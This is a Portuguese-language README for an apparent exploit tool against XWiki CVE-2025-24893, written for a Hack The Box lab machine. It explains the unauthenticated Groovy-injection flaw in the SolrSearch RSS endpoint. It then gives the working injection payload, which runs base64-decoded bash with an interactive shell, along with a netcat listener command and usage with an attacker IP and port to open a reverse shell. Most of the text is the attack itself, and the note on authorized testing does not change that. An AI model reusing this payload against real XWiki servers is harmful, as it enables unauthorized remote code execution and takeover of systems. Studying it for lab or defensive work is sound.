
Exploit RCE não autenticado para XWiki CVE-2025-24893 via injeção de script Groovy
Exploit de Execução Remota de Código não autenticada para versões do XWiki vulneráveis ao CVE-2025-24893.
Versões do XWiki anteriores a 15.10.9 são vulneráveis a RCE não autenticada através de injeção de script Groovy no manipulador de feed RSS do SolrSearch. A vulnerabilidade existe porque o XWiki não sanitiza adequadamente a entrada do usuário no parâmetro text, permitindo que atacantes saiam do contexto RSS e injetem código Groovy arbitrário.
ID CVE: CVE-2025-24893
Pontuação CVSS: 9.8 (Crítico)
Versões Afetadas: XWiki < 15.10.9
requests)pip3 install requests
python3 exploit.py <url_alvo> <ip_atacante> <porta_ouvinte>
Exemplo:
# Iniciar ouvinte na máquina atacante
nc -lvnp 9001
# Executar exploit
python3 exploit.py http://10.10.11.80:8080 10.10.14.5 9001
}}}}}}{{{{groovy}}}})/xwiki/bin/get/Main/SolrSearch?media=rss&text=<payload>O exploit tem como alvo o seguinte endpoint:
/xwiki/bin/get/Main/SolrSearch?media=rss&text=
A vulnerabilidade permite sair do contexto do feed RSS:
}}}}}}{{{{async async=false}}}}{{{{groovy}}}}
"bash -c {echo,<payload_base64>}|{base64,-d}|{bash,-i}".execute()
{{{{/groovy}}}}{{{{/async}}}}
Esta ferramenta é apenas para fins educacionais e de teste de penetração autorizado. O autor não é responsável por qualquer uso indevido ou danos causados por este programa. Utilize este exploit apenas contra sistemas que você possui ou possui permissão explícita para testar.
Licença MIT - Consulte o arquivo LICENSE para detalhes
Criado para a máquina HTB "Editor"
Nota: Sempre garanta que você tenha autorização adequada antes de testar qualquer sistema.